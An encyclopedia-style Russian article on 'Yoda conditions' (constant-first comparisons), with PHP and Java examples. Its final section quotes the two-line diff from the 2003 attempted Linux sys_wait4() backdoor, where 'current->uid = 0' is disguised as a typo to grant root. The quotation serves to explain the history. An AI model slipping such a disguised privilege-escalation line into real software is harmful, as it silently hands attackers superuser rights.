# Условия Йоды
Условия Йоды (от англ. Yoda conditions), или нотация Йоды (англ. Yoda notation) в жаргоне программистов — «безопасный» стиль записи выражений сравнения при программировании на языках с Си-синтаксисом, заключающийся в написании константного члена выражения (константы или вызова функции) слева от оператора сравнения (то есть 5 == a вместо привычного а == 5).
Такой стиль призван предотвратить свойственную данным языкам ошибку — использование операции присваивания «=» вместо сравнения «==». Ошибочное использование присваивания превращает нотацию Йоды в попытку изменить константу, вызывая ошибку на этапе компиляции, что исключает возможность появления в готовой программе ошибок данного вида, а также облегчает их поиск и исправление в новом коде.
Нотация названа в честь магистра Йоды из вселенной «Звёздных войн», имеющего манеру выстраивать слова фразы в обратном порядке.

## Суть нотации
В классической нотации проверка переменной на равенство некоторой константе записывается следующим образом (пример на языке PHP):
```
if
 
(
 
$variable
 
==
 
52
 
)
 
{
 
    
/* действия, выполняемые, если переменная равна 52 */

}

```

то есть переменная, операция сравнения и константа. Данная конструкция уязвима для известной ошибки:
```
if
 
(
 
$variable
 
=
 
52
 
)
 
{
 
// ОШИБКА: ПРИСВАИВАНИЕ переменной значения 52

    
/* действия, выполняемые ВСЕГДА, ибо значением выражения в скобках будет число 52, которое не равно нулю и поэтому в данном контексте рассматривается как true */

}

```

Такой код остается синтаксически правильным, и при ненадлежащем тестировании может остаться в программе на долгие годы и стать причиной серьёзной уязвимости.
При использовании нотации Йоды переменная и константа меняются местами, так что константа оказывается слева:
```
if
 
(
 
52
 
==
 
$variable
 
)
 
{

    
/* действия, выполняемые, если переменная равна 52 */

}

```

При такой нотации в случае опечатки в операторе сравнения получается синтаксически некорректное присваивание константе и программа не будет работать, пока ошибка не будет найдена и исправлена.
```
if
 
(
 
52
 
=
 
$variable
 
)
 
{
 
// ОШИБКА при компиляции

    
/* ... */

}

```

Совершенно аналогично для функций:
```
if
 
(
 
someFunction
()
 
=
 
$variable
 
)
 
{
 
// ОШИБКА при компиляции

    
/* ... */

}

```

## Альтернативное использование нотации
Нотация Йоды также применима в разрешении проблемы небезопасного «нулевого поведения» (англ. unsafe null behavior) например (пример на языке Java):
```
String
 
myString
 
=
 
null
;

if
 
(
 
myString
.
equals
(
"foobar"
)
 
)
 
{
 
// Вызывает NullPointerException

    
/* ... */
 

}

```

При применении нотации Йоды:
```
String
 
myString
 
=
 
null
;

if
 
(
 
"foobar"
.
equals
(
myString
)
 
)
 
{
 
// Результат - Ложь

   
/* не выполняется */
 

}

```

## Достоинства и недостатки
Использование нотации Йоды не позволяет программам на языках C++, Java, PHP и других работать при наличии ошибок в выражениях сравнения (поведения программы данная модификация не меняет). Некоторые программисты считают использование данной нотации «признаком хорошего тона».
К недостаткам нотации относится сложность написания, модификации и чтения программы, а также довольно узкая область применения — только сравнение на равенство, только сравнение с константой или результатом вызова функции. Современные инструментальные средства разработки (компиляторы, редакторы) позволяют отслеживать и выдавать предупреждения, когда встречают присваивание в управляющей конструкции, считая его потенциально ошибочным.

## Ошибкаsys_wait4()
Примечательна неудавшаяся попытка внедрения бэкдора в функцию sys_wait4() в ядре Linux (2003). Разработка шла на проприетарной системе управления версиями BitKeeper, по ночам код выкладывался на более распространённый CVS. Этот CVS и взломали, добавив в обработчик системного вызова sys_wait4() код, как будто проверяющий входные данные на некорректную комбинацию флагов:
```
+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
```

Бэкдор был замаскирован под простую опечатку — вместо == стояло =. Таким образом, передача в функцию двух флагов, противоречащих друг другу, выполняла код current->uid = 0, то есть давала программе права суперпользователя.
Очередная выкачка информации на CVS дала сбой, и инородные патчи удалили до того, как стало ясно, что они собой представляют. В стабильное ядро патч попасть не мог (связь между BitKeeper и CVS односторонняя). Автора бэкдора найти не удалось.